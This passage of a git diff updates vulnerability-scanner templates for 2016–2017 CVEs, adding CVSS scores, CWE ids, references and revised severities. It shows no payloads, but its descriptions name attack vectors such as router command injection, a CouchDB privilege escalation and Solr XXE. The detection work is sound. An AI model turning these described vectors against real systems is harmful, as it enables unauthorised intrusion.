https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html tags: wordpress,cve,cve2016,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-10033 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 4134b4a8b4..e70c75ed3a 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -9,6 +9,11 @@ info: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 tags: cve,cve2016,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-10956 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 9f3466faaa..7d70ef5104 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml 
@@ -3,13 +3,18 @@ id: CVE-2016-10960 info: name: wSecure Lite < 2.4 - Remote Code Execution (RCE) author: daffainfo - severity: critical + severity: high description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 tags: cve,cve2016,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-10960 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index 5dcf8191cd..0f3716e9fe 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml @@ -8,6 +8,12 @@ info: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 tags: cve,cve2016,wordpress,wp-theme,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2016-10993 + cwe-id: CWE-79 + description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 639320dfc8..8111ac538d 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-2004 + cwe-id: CWE-306 network: - inputs: diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml index a65ee5deea..364e21e9ba 100644 
--- a/cves/2016/CVE-2016-2389.yaml +++ b/cves/2016/CVE-2016-2389.yaml @@ -9,6 +9,11 @@ info: - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://www.cvedetails.com/cve/CVE-2016-2389 tags: cve,cve2016,lfi,sap + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-2389 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 26b9577ef4..86662795dc 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -10,6 +10,11 @@ info: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html tags: cve,cve2016,struts,rce,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2016-3081 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 2238126a04..40868caf7e 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -7,6 +7,11 @@ info: description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. tags: cve,cve2016,iot,netgear,router reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-5649 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 964fdfed40..fddddf2586 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml 
@@ -3,12 +3,17 @@ id: CVE-2016-6277 info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu - severity: critical + severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. tags: cve,cves2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-6277 + cwe-id: CWE-352 requests: - method: GET diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 686d2c2635..0e56752878 100644 --- a/cves/2016/CVE-2016-7552.yaml +++ b/cves/2016/CVE-2016-7552.yaml @@ -7,6 +7,11 @@ info: description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 tags: cve,cve2016,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-7552 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml index 9f543433f5..a15b21c00b 100644 --- a/cves/2016/CVE-2016-7981.yaml +++ b/cves/2016/CVE-2016-7981.yaml 
@@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 tags: cve,cve2016,xss,spip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-7981 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index 7dc6d15282..c1eb936feb 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -7,6 +7,11 @@ info: description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. reference: https://www.exploit-db.com/exploits/45196 tags: cve,cve2017,oracle,glassfish,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000028 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index cb3e001dd0..ef6415afce 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal tags: cve,cve2017,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000170 + cwe-id: CWE-22 requests: - method: POST diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 16dc0d9801..d7a07c5e57 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml 
@@ -11,6 +11,11 @@ info: - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 tags: cve,cve2017,primetek,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-1000486 + cwe-id: CWE-326 requests: - raw: diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml index 34dde57e91..d7eb8e1003 100644 --- a/cves/2017/CVE-2017-10075.yaml +++ b/cves/2017/CVE-2017-10075.yaml @@ -3,10 +3,14 @@ id: CVE-2017-10075 info: name: Oracle Content Server XSS author: madrobot - severity: medium + severity: high description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site. reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html tags: cve,cve2017,xss,oracle + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2017-10075 requests: - method: GET diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 26de578c10..1e9b5d37af 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -9,6 +9,10 @@ info: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc tags: cve,cve2017,rce,oracle,weblogic + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2017-10271 requests: - raw: diff --git a/cves/2017/CVE-2017-11444.yaml b/cves/2017/CVE-2017-11444.yaml index 0af1f0dba3..324b2e11ac 100644 --- a/cves/2017/CVE-2017-11444.yaml +++ b/cves/2017/CVE-2017-11444.yaml 
@@ -3,12 +3,17 @@ id: CVE-2017-11444 info: name: Subrion CMS SQL Injection author: dwisiswant0 - severity: high + severity: critical description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array. reference: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q tags: cve,cve2017,sqli,subrion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-11444 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml index fd2fd2781a..8ead0e5c2a 100755 --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml @@ -10,6 +10,11 @@ info: - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 tags: cve,cve2017,java,rce,deserialization + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12149 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index da7a45c350..e6b40b0d91 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 tags: cve,cve2017,ilo4,hpe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-12542 requests: - method: GET diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index ae2639eebb..d4f8d1050e 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml 
@@ -7,6 +7,11 @@ info: description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. reference: https://struts.apache.org/docs/s2-053.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12611 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index e78786d62d..2c16f2c1fe 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml @@ -3,7 +3,7 @@ id: CVE-2017-12615 info: name: Apache Tomcat RCE author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,apache,rce reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | @@ -11,6 +11,11 @@ info: This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-12615 + cwe-id: CWE-434 requests: - method: PUT diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index f9f543a9b9..653122ae26 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml 
@@ -10,6 +10,12 @@ info: - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12629 + cwe-id: CWE-611 + description: "Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr." requests: - raw: diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 5565f23393..7e7edb5586 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml 
@@ -3,10 +3,15 @@ id: CVE-2017-12635 info: name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation author: pikpikcu - severity: high + severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. reference: https://github.com/assalielmehdi/CVE-2017-12635 tags: cve,cve2017,couchdb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12635 + cwe-id: CWE-269 requests: - raw: diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index 46cbdb8d04..905e10391a 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml @@ -10,6 +10,11 @@ info: - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-12637 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index 56d43089ee..ad1ea847cc 100644 
--- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml @@ -10,6 +10,11 @@ info: description: | In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. tags: xss,django,cve,cve2017 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index 6a91a097cf..a9b3be6385 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -8,6 +8,12 @@ info: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 tags: cve,cve2017,trixbox,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." requests: - raw: diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 9772411357..03689a2002 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://sourceforge.net/projects/asteriskathome/ # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2017-14537 + cwe-id: CWE-22 requests: - raw: 
diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml index 763aeee7c4..91fc63e9f3 100644 --- a/cves/2017/CVE-2017-14651.yaml +++ b/cves/2017/CVE-2017-14651.yaml @@ -6,6 +6,15 @@ info: severity: medium description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. tags: cve,cve2017,wso2,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.80 + cve-id: CVE-2017-14651 + cwe-id: CWE-79 + reference: + - https://github.com/cybersecurityworks/Disclosed/issues/15 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 + - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html requests: - method: GET diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml index 184da5d96f..6a386ab381 100644 --- a/cves/2017/CVE-2017-14849.yaml +++ b/cves/2017/CVE-2017-14849.yaml @@ -6,6 +6,15 @@ info: severity: high description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. tags: cve,cve2017,nodejs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-14849 + cwe-id: CWE-22 + reference: + - https://twitter.com/nodejs/status/913131152868876288 + - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ + - http://www.securityfocus.com/bid/101056 requests: - method: GET diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml index 5102cbacf4..57a6eda186 100644 --- a/cves/2017/CVE-2017-15647.yaml +++ b/cves/2017/CVE-2017-15647.yaml 
@@ -3,12 +3,17 @@ id: CVE-2017-15647 info: name: FiberHome - Directory Traversal author: daffainfo - severity: medium + severity: high description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. reference: - https://www.exploit-db.com/exploits/44054 - https://www.cvedetails.com/cve/CVE-2017-15647 tags: cve,cve2017,lfi,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 2de5b8d83a..2a2853e552 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-15715 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index f68fcd4a77..41f4f5c82f 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -7,8 +7,12 @@ info: reference: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - severity: high + severity: critical tags: cve,cve2017,rce,vpn,paloalto,globalprotect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-15944 requests: - raw: diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml index ef7744125e..e4057dae37 100644 --- a/cves/2017/CVE-2017-16806.yaml +++ b/cves/2017/CVE-2017-16806.yaml 
@@ -6,6 +6,12 @@ info: reference: https://www.exploit-db.com/exploits/43141 severity: high tags: cve,cve2017,ulterius,traversal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16806 + cwe-id: CWE-22 + description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal." requests: - method: GET diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index 6af9898153..ed8c14a5be 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -7,6 +7,11 @@ info: description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information. reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 tags: cve,cve2017,nextjs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16877 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 8dab040905..9eb08d7a3a 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -7,6 +7,11 @@ info: description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 10ad0d299d..5fcc0923df 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml 
@@ -9,6 +9,11 @@ info: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17059 + cwe-id: CWE-79 requests: - method: POST diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index 9a2c3bce2f..2cd0371034 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -7,6 +7,11 @@ info: description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17451 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index ab048ea172..0f87ecde9f 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -10,6 +10,11 @@ info: - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 severity: high tags: cve,cve2017,rce,embedthis,goahead,fuzz + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-17562 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index 9388b6bf6c..89de79241d 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml 
@@ -11,6 +11,11 @@ info: description: | AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. tags: cve,cve2017,xss,avantfax + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18024 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index 7bed4c11c3..4f60e9dca3 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -7,6 +7,11 @@ info: description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18536 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-18638.yaml 